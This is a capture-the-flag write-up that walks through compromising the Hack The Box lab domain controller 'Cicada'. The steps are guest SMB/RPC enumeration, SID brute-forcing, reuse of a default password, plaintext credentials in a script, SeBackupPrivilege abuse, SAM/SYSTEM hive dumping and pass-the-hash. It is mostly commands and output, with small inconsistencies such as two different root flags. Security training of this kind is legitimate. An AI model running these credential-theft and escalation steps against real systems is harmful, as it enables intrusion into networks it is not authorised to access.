Post

Hack The Box Write-Up Cicada

About Cicada

In this post, I’m writing a write-up for the machine Cicada from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

Cicada is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.

Foothold

User

Root

Machine Info

Machine Name: Cicada
Difficulty: Easy
Points: 20
Release Date: 07 Nov 2020
IP: 10.129.231.149
Creator: theblxckcicada

Recon

Portscan with Nmap

As always, we start this machine with a portscan with Nmap.

1
nmap -sC -sV -oA ./nmap/10.129.231.149 10.129.231.149

The results.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 05:23 CST         
Nmap scan report for 10.129.231.149                                                     
Host is up (0.075s latency).                                                            
Not shown: 989 filtered tcp ports (no-response)                                         
PORT     STATE SERVICE       VERSION                                                    
53/tcp   open  domain        Simple DNS Plus                                            
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-19 18:24:04Z)                                                                                                  
135/tcp  open  msrpc         Microsoft Windows RPC                                      
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn                              
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)                                                                   
|_ssl-date: TLS randomness does not represent time                                      
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb                                    
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb                                                                                         
| Not valid before: 2024-08-22T20:24:16                                                 
|_Not valid after:  2025-08-22T20:24:16                                                 
445/tcp  open  microsoft-ds?                                                            
464/tcp  open  kpasswd5?                                                                
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                        
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)                                                                   
|_ssl-date: TLS randomness does not represent time                                      
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb                                    
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time                                      
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb                                    
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-19T18:24:48
|_  start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 95.05 seconds

Enemuration

rpcclient

Connect to rpcclient as guest user. ANONYMOUS LOGON was also workuing, but with limit access.

1
$ rpcclient --user GUEST --password="" cicada.htb

Try to find as which user we are connected with. We have now some sids, we can now try to bruteforce the sids.

1
2
3
4
5
6
7
8
rpcclient $> lookupnames GUEST
GUEST S-1-5-21-917908876-1423158569-3159038727-501 (User: 1)
rpcclient $> 
rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-500
S-1-5-21-917908876-1423158569-3159038727-500 CICADA\Administrator (1)
rpcclient $> 
rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-502
S-1-5-21-917908876-1423158569-3159038727-502 CICADA\krbtgt (1)

Found two users Guest and Administrator

smbmap

Checked the SMB

1
2
3
4
5
6
7
8
9
10
11
$ smbmap -H cicada.htb -u "guest" -p ""
[+] IP: cicada.htb:445  Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     NO ACCESS
        HR                                                      READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        SYSVOL                                                  NO ACCESS       Logon server share 

found some interessting shares. Connect to the HR share.

1
2
3
4
5
6
7
8
9
10
11
12
13

Found the file `Notice from HR.txt`.

```console
root@htb-1d522eiiwk:/home/t13nn3s/my_data# smbclient //cicada.htb/HR --user guest --password ""
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 07:29:09 2024
  ..                                  D        0  Thu Mar 14 07:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 12:31:48 2024

                4168447 blocks of size 4096. 439288 blocks available
smb: \> 

Downloaded the file

1
2
3
smb: \> mget "Notice from HR.txt"
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (38.6 KiloBytes/sec) (average 38.6 KiloBytes/sec)

Checked the contents of the file.

1
$ cat Notice\ from\ HR.txt 

The contents:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Nice! We found the default password Cicada$M6Corpb*@Lp#nZp!8

User enumeration

We now only have to find some usernames and check if the default password fits for some users. Wrote a small bash script to enumerate the users based on their sid

1
2
3
for i in $(seq 500 4000); do
    rpcclient --user "GUEST" --password="" cicada.htb -c "lookupsids S-1-5-21-917908876-1423158569-3159038727-$i" | grep -v "CICADA";
done

After running the script, we found the following usernames

1
2
3
4
5
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

After some testing with smbmap we found that the default password works for the user michael.wrightson.

1
2
3
4
5
6
7
8
9
10
11
12
smbmap -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -H cicada.htb
[+] IP: cicada.htb:445  Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     NO ACCESS
        HR                                                      READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
root@htb-vbpxy0fxms:/home/t13nn3s/my_data# 

First tried to establish an WinRM connection with this machine with the user michael.wrightson, but he has no permission. Since we have credentials to authenticate against the Active Directory we can run Bloodhound.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
bloodhound-python --domain cicada.htb -c all -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -dc cicada-dc.cicada.htb -ns 10.129.231.149 --dns-tcp
INFO: Found AD domain: cicada.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 9 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CICADA-DC.cicada.htb
INFO: Done in 00M 02S

The user account emily.oscars is member of the group REMOTE MANAGEMENT [email protected].

Hack The Box Write-Up Cicada by T13nn3s Bloodhound Output

Aftre further analysis of the members of the group [email protected] we can

Hack The Box Cicada Write-Up by T13nn3s password of david.orelious

We have found the password aRt$Lp#7t*VQ!3 that belongs to the user david.orelious.

We can restart the enumeration process of the SMB.

1
smbmap -H cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3'

The output.

1
2
3
4
5
6
7
8
9
10
[+] IP: cicada.htb:445  Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     READ ONLY
        HR                                                      READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share

Connect to the DEV share.

1
smbclient //cicada.htb/DEV --user david.orelious --password 'aRt$Lp#7t*VQ!3'

Interesting file Backup_script.ps1. Download the script.

1
2
3
4
5
6
7
8
9
10
11
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 13:31:39 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 19:28:22 2024

                4168447 blocks of size 4096. 424721 blocks available
smb: \> mget Backup_script.ps1 
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (3,9 KiloBytes/sec) (average 3,9 KiloBytes/sec)
smb: \>

Contents of the script.

1
2
3
4
5
6
7
8
9
10
11
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

evil winrm session as emily.oscars.

1
evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb

read the user flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> ls


    Directory: C:\Users\emily.oscars.CICADA\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        11/30/2024   9:29 AM             34 user.txt


*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
ce92f2c2963fea6d4308b59a36eb2dae
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop>

Privilege Escalation

Enumeration

The user account emily.oscars has the SeBackupPrivilege.

1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

upload the files

1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> upload /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeCmdLets.dll
                                        
Info: Uploading /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeCmdLets.dll to C:\Users\emily.oscars.CICADA\Documents\SeBackupPrivilegeCmdLets.dll
                                        
Data: 16384 bytes of 16384 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> upload /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeUtils.dll
                                        
Info: Uploading /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeUtils.dll to C:\Users\emily.oscars.CICADA\Documents\SeBackupPrivilegeUtils.dll
                                        
Data: 21844 bytes of 21844 bytes copied
                                        
Info: Upload successful!

import the modules.

1
2
3
4
5
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Copy-FileSeBackupPrivilege 'C:\users\administrator\desktop\root.txt' .\root.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type root.txt
9668a9dbfd79509169398cbe43f4151a

Privilege Escalation

Download system and sam

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam
                                        
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system
                                        
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
Progress: 28% : |▓▒░░░░░░░░|

Use secretsdump

1
2
3
4
5
6
7
8
9
10
impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up... 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
─[eu-dedivip-1]─[10.10.14.38]─[t13nn3s@htb-j5kiqrdxs4]─[~/my_data]
└──╼ [★]$ evil-winrm -u administrator -p 'aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341' -i cicada.htb
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
3cbbc6b21aaa327e9f98355c30e09de5
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

We have owned CICADA!

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856. Thanks!

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.